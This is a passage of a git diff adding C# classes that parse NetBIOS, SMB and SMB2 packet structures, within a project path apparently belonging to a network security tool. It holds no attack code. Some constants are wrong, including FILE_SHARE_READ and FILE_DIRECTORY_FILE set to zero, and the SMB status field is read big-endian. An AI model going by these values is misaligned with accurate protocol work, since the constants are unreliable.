reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System.IO; + +namespace Quiddity.NetBIOS +{ + class NetBIOSSessionService + { + // https://tools.ietf.org/html/rfc1002 + public byte Type { get; set; } + public byte Flags { get; set; } + public ushort Length { get; set; } + + public NetBIOSSessionService() + { + this.Type = 0x00; + this.Flags = 0x00; + } + + public NetBIOSSessionService(byte[] data) + { + ReadBytes(data); + } + + public void ReadBytes(byte[] data) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + this.Type = packetReader.ReadByte(); + this.Flags = packetReader.ReadByte(); + this.Length = packetReader.BigEndianReadUInt16(); + } + + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.Write(this.Type); + packetWriter.Write(this.Flags); + packetWriter.BigEndianWrite(this.Length); + return memoryStream.ToArray(); + } + + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/PacketReader.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/PacketReader.cs new file mode 100644 index 0000000..06588af --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/PacketReader.cs @@ -0,0 +1,74 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.IO; + +namespace Quiddity +{ + class PacketReader : BinaryReader + { + public PacketReader(Stream stream) : base(stream) { } + + public ushort BigEndianReadUInt16() + { + byte[] data = base.ReadBytes(2); + Array.Reverse(data); + return BitConverter.ToUInt16(data, 0); + } + + public uint BigEndianReadUInt32() + { + byte[] data = base.ReadBytes(4); + Array.Reverse(data); + return BitConverter.ToUInt32(data, 0); + } + + public byte[] BigEndianReadBytes(int count) + { + byte[] data = base.ReadBytes(count); + Array.Reverse(data); + return data; + } + + public string ReadBinary(int count) + { + + if (count == 1) + { + return Convert.ToString(base.ReadByte(), 2).PadLeft(8, '0'); + } + + return Convert.ToString(BitConverter.ToUInt16(BigEndianReadBytes(count), 0), 2).PadLeft(count * 8, '0'); + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/PacketWriter.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/PacketWriter.cs new file mode 100644 index 0000000..4380a40 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/PacketWriter.cs @@ -0,0 +1,76 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.IO; +using System.Text; + +namespace Quiddity +{ + class PacketWriter : BinaryWriter // todo optimize + { + public PacketWriter(Stream stream) : base(stream) { } + + public void BigEndianWrite(ushort number) + { + byte[] data = BitConverter.GetBytes(number); + Array.Reverse(data); + base.Write(data); + } + + public void BigEndianWrite(uint number) + { + byte[] data = BitConverter.GetBytes(number); + Array.Reverse(data); + base.Write(data); + } + + public void BigEndianWrite(int number) + { + byte[] data = BitConverter.GetBytes(number); + Array.Reverse(data); + base.Write(data); + } + + public void BigEndianWrite(byte[] data) + { + Array.Reverse(data); + base.Write(data); + } + + public void StringWrite(string String) + { + byte[] data = Encoding.UTF8.GetBytes(String); + base.Write(data); + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXRequest.cs new file mode 100644 index 0000000..369414d --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXRequest.cs @@ -0,0 +1,92 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.SMB +{ + class SMBCOMSessionSetupAndXRequest + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb/a00d0361-3544-4845-96ab-309b4bb7705d + public byte WordCount { get; set; } + public byte AndXCommand { get; set; } + public byte AndXReserved { get; set; } + public ushort AndXOffset { get; set; } + public ushort MaxBufferSize { get; set; } + public ushort MaxMpxCount { get; set; } + public ushort VcNumber { get; set; } + public uint SessionKey { get; set; } + public ushort SecurityBlobLength { get; set; } + public uint Reserved { get; set; } + public uint Capabilities { get; set; } + public ushort ByteCount { get; set; } + public byte[] SecurityBlob { get; set; } + + public SMBCOMSessionSetupAndXRequest() + { + + } + + public SMBCOMSessionSetupAndXRequest(byte[] data, int offset) + { + ReadBytes(data, offset); + } + + public void ReadBytes(byte[] data, int offset) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = offset; + this.WordCount = packetReader.ReadByte(); + this.AndXCommand = packetReader.ReadByte(); + this.AndXReserved = packetReader.ReadByte(); + this.AndXOffset = packetReader.ReadUInt16(); + this.MaxBufferSize = packetReader.ReadUInt16(); + this.MaxMpxCount = packetReader.ReadUInt16(); + this.VcNumber = packetReader.ReadUInt16(); + this.SessionKey = packetReader.ReadUInt32(); + this.SecurityBlobLength = packetReader.ReadUInt16(); + this.Reserved = packetReader.BigEndianReadUInt32(); + this.Capabilities = packetReader.ReadUInt32(); + this.ByteCount = packetReader.ReadUInt16(); + this.SecurityBlob = packetReader.ReadBytes(this.SecurityBlobLength); + } + + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXResponse.cs new file mode 100644 index 0000000..3162e61 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/Commands/SMBCOMSessionSetupAndXResponse.cs @@ -0,0 +1,91 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.SMB +{ + class SMBCOMSessionSetupAndXResponse + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb/e5a467bc-cd36-4afa-825e-3f2a7bfd6189 + public byte WordCount { get; set; } + public byte AndXCommand { get; set; } + public byte AndXReserved { get; set; } + public ushort AndXOffset { get; set; } + public ushort Action { get; set; } + public ushort SecurityBlobLength { get; set; } + public ushort ByteCount { get; set; } + public byte[] SecurityBlob { get; set; } + + public SMBCOMSessionSetupAndXResponse() + { + + } + + public SMBCOMSessionSetupAndXResponse(byte[] data, int offset) + { + ReadBytes(data, offset); + } + + public void ReadBytes(byte[] data, int offset) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = offset; + this.WordCount = packetReader.ReadByte(); + + if (this.WordCount != 0) + { + this.AndXCommand = packetReader.ReadByte(); + this.AndXReserved = packetReader.ReadByte(); + this.AndXOffset = packetReader.ReadUInt16(); + this.Action = packetReader.ReadUInt16(); + this.SecurityBlobLength = packetReader.ReadUInt16(); + } + + this.ByteCount = packetReader.ReadUInt16(); + + if (this.WordCount != 0) + { + this.SecurityBlob = packetReader.ReadBytes(SecurityBlobLength); + } + + } + + } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/SMBHeader.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/SMBHeader.cs new file mode 100644 index 0000000..f969b38 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/SMBHeader.cs @@ -0,0 +1,93 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System.IO; + +namespace Quiddity.SMB +{ + //https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-cifs/69a29f73-de0c-45a6-a1aa-8ceeea42217f + + class SMBHeader + { + public byte[] Protocol { get; set; } + public byte Command { get; set; } + public uint Status { get; set; } + public byte Flags { get; set; } + public ushort Flags2 { get; set; } + public ushort PIDHigh { get; set; } + public byte[] SecurityFeatures { get; set; } + public ushort Reserved { get; set; } + public ushort TID { get; set; } + public ushort PIDLow { get; set; } + public ushort UID { get; set; } + public ushort MID { get; set; } + + public SMBHeader() + { + this.Protocol = new byte[4] { 0xff, 0x53, 0x4d, 0x42 }; + } + + public SMBHeader(byte[] data) + { + ReadBytes(data, 0); + } + + public SMBHeader (byte[] data, int offset) + { + ReadBytes(data, offset); + } + + public void ReadBytes(byte[] data, int offset) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = offset; + this.Protocol = packetReader.ReadBytes(4); + this.Command = packetReader.ReadByte(); + this.Status = packetReader.BigEndianReadUInt32(); + this.Flags = packetReader.ReadByte(); + this.Flags2 = packetReader.BigEndianReadUInt16(); + this.PIDHigh = packetReader.BigEndianReadUInt16(); + this.SecurityFeatures = packetReader.ReadBytes(8); + this.Reserved = packetReader.BigEndianReadUInt16(); + this.TID = packetReader.BigEndianReadUInt16(); + this.PIDLow = packetReader.BigEndianReadUInt16(); + this.UID = packetReader.BigEndianReadUInt16(); + this.MID = packetReader.BigEndianReadUInt16(); + } + + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/SMBHelper.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/SMBHelper.cs new file mode 100644 index 0000000..80bf24d --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB/SMBHelper.cs @@ -0,0 +1,70 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System.IO; + +namespace Quiddity.SMB +{ + class SMBHelper + { + public byte[] Protocol { get; set; } + + public SMBHelper() + { + this.Protocol = new byte[4]; + } + + public SMBHelper(byte[] data) + { + ReadBytes(data, 0); + } + + public SMBHelper(byte[] data, int offset) + { + ReadBytes(data, offset); + } + + public SMBHelper ReadBytes(byte[] data, int offset) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = offset; + this.Protocol = packetReader.ReadBytes(4); + return this; + } + + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CloseRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CloseRequest.cs new file mode 100644 index 0000000..cea586e --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CloseRequest.cs @@ -0,0 +1,47 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.SMB2 +{ + class SMB2CloseRequest + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/f84053b0-bcb2-4f85-9717-536dae2b02bd + public ushort StructureSize { get; set; } + public byte[] Flags { get; set; } + public byte[] Reserved { get; set; } + public byte[] Field { get; set; } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CloseResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CloseResponse.cs new file mode 100644 index 0000000..7241ada --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CloseResponse.cs @@ -0,0 +1,54 @@ + +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.SMB2 +{ + class SMB2CloseResponse + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/c0c15c57-3f3e-452b-b51c-9cc650a13f7b + public ushort StructureSize { get; set; } + public byte[] Flags { get; set; } + public byte[] Reserved { get; set; } + public byte[] CreationTime { get; set; } + public byte[] LastAccessTime { get; set; } + public byte[] LastWriteTime { get; set; } + public byte[] ChangeTime { get; set; } + public byte[] AllocationSize { get; set; } + public byte[] EndofFile { get; set; } + public byte[] FileAttributes { get; set; } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CreateRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CreateRequest.cs new file mode 100644 index 0000000..52c62ff --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2CreateRequest.cs @@ -0,0 +1,120 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; +using Quiddity.SMB2; + +namespace Quiddity.SMB2 +{ + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/e8fb45c1-a03d-44ca-b7ae-47385cfd7997 + enum RequestedOplockLevel : byte + { + SMB2_OPLOCK_LEVEL_NONE = 0x00, + SMB2_OPLOCK_LEVEL_II = 0x01, + SMB2_OPLOCK_LEVEL_EXCLUSIVE = 0x08, + SMB2_OPLOCK_LEVEL_BATCH = 0x09, + SMB2_OPLOCK_LEVEL_LEASE = 0xFF + } + + enum ImpersonationLevel : uint + { + Anonymous = 0x00000000, + Identification = 0x00000001, + Impersonation = 0x00000002, + Delegate = 0x00000003 + } + + enum ShareAccess : uint + { + FILE_SHARE_READ = 0x00000000, + FILE_SHARE_WRITE = 0x0000002, + FILE_SHARE_DELETE = 0x00000004 + } + + enum CreateDisposition : uint + { + FILE_SUPERSEDE = 0x00000000, + FILE_OPEN = 0x0000001, + FILE_CREATE = 0x00000002, + FILE_OPEN_IF = 0x00000003, + FILE_OVERWRITE = 0x00000004, + FILE_OVERWRITE_IF = 0x00000005 + } + + enum CreateOptions : uint + { + FILE_DIRECTORY_FILE = 0x00000000, + FILE_WRITE_THROUGH = 0x0000001, + FILE_SEQUENTIAL_ONLY = 0x00000004, + FILE_NO_INTERMEDIATE_BUFFERING = 0x00000008, + FILE_SYNCHRONOUS_IO_ALERT = 0x00000010, + FILE_SYNCHRONOUS_IO_NONALERT = 0x00000020, + FILE_NON_DIRECTORY_FILE = 0x00000040, + FILE_COMPLETE_IF_OPLOCKED = 0x00000100, + FILE_NO_EA_KNOWLEDGE = 0x00000200, + FILE_RANDOM_ACCESS = 0x00000800, + FILE_DELETE_ON_CLOSE = 0x00001000, + FILE_OPEN_BY_FILE_ID = 0x00002000, + FILE_OPEN_FOR_BACKUP_INTENT = 0x00004000, + FILE_NO_COMPRESSION = 